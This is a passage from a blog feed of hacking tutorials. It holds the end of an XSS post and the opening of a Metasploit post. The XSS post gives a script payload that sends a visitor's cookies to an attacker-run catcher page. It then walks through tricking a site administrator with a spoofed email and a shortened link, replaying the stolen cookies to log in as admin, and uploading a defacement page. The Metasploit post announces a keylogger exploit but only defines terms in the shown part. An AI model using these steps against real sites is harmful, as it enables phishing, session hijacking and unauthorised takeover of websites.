&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;I will use this link for this method: http://adf.ly/1I6ns&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now in front of the search.php?search= add this:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;document.location=&quot;www.you.110mb.com/cookie catcher.php?c=&quot; + document.cookie&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now go to&amp;nbsp;&lt;a href=&quot;http://www.spam.com/&quot; style=&quot;color: #d1512a; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;http://www.spam.com&lt;/a&gt;&amp;nbsp;and shrink the whole page&#39;s link. Try to find a site administrator&#39;s E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one:&amp;nbsp;&lt;a href=&quot;http://emkei.cz/&quot; style=&quot;color: #d1512a; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;GET FREE FAKE MAILER&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now in the body just tell something fake like[/color]: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;color: red; font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Session Hijacking:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Ok now you have the Admin&#39;s cookies either way, so we need to edit our own browser&#39;s cookies. First go to that page&#39;s admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Now go in that vulnerable website and clear the link. Instead of that link add this:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Javascript:void(document.cookie=&quot;&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;or for an example:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Javascript:void(document.cookie=&quot;__utma=255621336.1130089386.1295743598.1305934653.1305950205.86&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;So now go in your Admin Panel and upload your Deface Page.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;de1&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;de2&quot; style=&quot;color: #333333; margin: 0px; outline: none; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: medium; margin: 0px; padding: 0px;&quot;&gt;Good Luck. Now you have Hacked a Website with XSS.&lt;/span&gt;&lt;/div&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/1662173660841419809/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/xxs-cross-site-scripting-tut.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/1662173660841419809'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/1662173660841419809'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/xxs-cross-site-scripting-tut.html' title='XXS (cross site scripting tut) '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-8041782033702950218</id><published>2013-07-20T08:27:00.001-07:00</published><updated>2013-07-29T06:00:19.123-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="tool"/><title type='text'>Metasploit </title><content type='html'>&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;--- The Metasploit Framework ---&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;&quot;&gt;
&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #990000; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Note&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;&quot;&gt;
&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here&#39;s the answer. He could 0wN you, or in other words , he could have full access to your PC provided you hav&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: georgia; font-size: x-small; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;e just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: georgia; font-size: xx-small; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: georgia; font-size: xx-small; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Metasploit is a hacker&#39;s best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: georgia; font-size: x-small; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;The topic Metasploit is very vast in itself.However, i&#39;ll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasp&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;loit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;In this tutorial, i&#39;ll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim&#39;s machine.&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Hacking through Metasploit is done in 3 simple steps&lt;/span&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;:&amp;nbsp;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Point, Click, 0wn&lt;/u&gt;&lt;/b&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;.&lt;/u&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br style=&quot;margin: 0px; padding: 0px;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: #990000; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Vulnerability&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: #990000; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Exploit:&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: #990000; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Overflow&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: transparent; border: 0px; color: #990000; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Payload&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&amp;nbsp;Actual code which runs on the compromised system after exploitation&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 0px 0in; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 9pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;o:p style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
